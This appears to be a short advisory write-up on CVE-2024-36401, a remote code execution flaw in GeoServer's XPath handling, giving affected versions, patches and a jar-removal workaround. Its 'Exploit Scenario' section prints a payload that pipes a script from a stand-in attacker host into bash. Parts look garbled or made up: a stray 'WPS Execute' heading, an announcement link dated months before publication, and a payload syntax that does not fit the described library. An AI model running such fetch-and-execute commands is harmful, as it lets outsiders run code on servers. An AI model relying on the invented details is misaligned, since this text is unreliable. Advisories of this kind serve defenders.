CVE-2024-36401 - Remote Code Execution Vulnerability in GeoServer Versions Prior to 2.23.6, 2.24.4, and 2.25.2

GeoServer (https://geoserver.org/) is a popular open source server that allows users to share, process, and edit geospatial data. It is built on the GeoTools library and supports various Open Geospatial Consortium (OGC) standards such as Web Feature Service (WFS), Web Map Service (WMS), and Web Processing Service (WPS). However, a critical vulnerability has been discovered in multiple OGC request parameters of GeoServer versions prior to 2.23.6, 2.24.4, and 2.25.2.

Details of Vulnerability

The vulnerability, identified as CVE-2024-36401, is a remote code execution (RCE) vulnerability that affects all GeoServer installations and allows unauthenticated users to execute arbitrary code through specifically crafted input. The issue stems from the GeoTools library API that evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library, which is known to execute arbitrary code when evaluating XPath expressions.

Exploit Scenario

An attacker can exploit the vulnerability if they have the ability to send requests to a GeoServer instance. By crafting a malicious request with a specially crafted payload, an attacker can trigger the Remote Code Execution vulnerability. By exploiting this vulnerability, an attacker can gain access to the server running GeoServer and perform malicious actions such as data theft or server compromise.

The following code snippet demonstrates the type of XPath expression that could be used in a malicious request:

/Feature[@name='system("curl attacker.com/exploit_code.sh | bash")']

WPS Execute

There is no public proof-of-concept (PoC) available at this time. However, the vulnerability has been confirmed to be exploitable by the GeoServer security team.

Solution

The GeoServer team has released patched versions of GeoServer (2.23.6, 2.24.4, and 2.25.2) that contain a fix for this vulnerability. It is strongly recommended to upgrade to one of these versions to protect against this critical vulnerability.

Workaround

If you are unable to upgrade your GeoServer instance to one of the patched versions, you can apply a temporary workaround by removing the vulnerable code from your GeoServer instance. To do this, remove the gt-complex-x.y.jar file from your GeoServer installation, where x.y is the GeoTools version (e.g., gt-complex-31.1.jar if running GeoServer 2.25.1). This will remove the vulnerable code but may also break some GeoServer functionality or prevent GeoServer from deploying if the gt-complex module is needed.

Conclusion

This vulnerability in GeoServer poses a significant risk to users of affected versions, as it allows unauthenticated users to remotely execute arbitrary code. It is essential to upgrade to a patched version or apply the suggested workaround to protect your server from potential exploitation.

For the latest information on this vulnerability and available patches, visit the GeoServer website at: https://geoserver.org/announcements/2024/04/12/jdd-2024-36401-geoserver.html

Timeline

Published on: 07/01/2024 16:15:04 UTC
Last modified on: 07/18/2024 21:28:49 UTC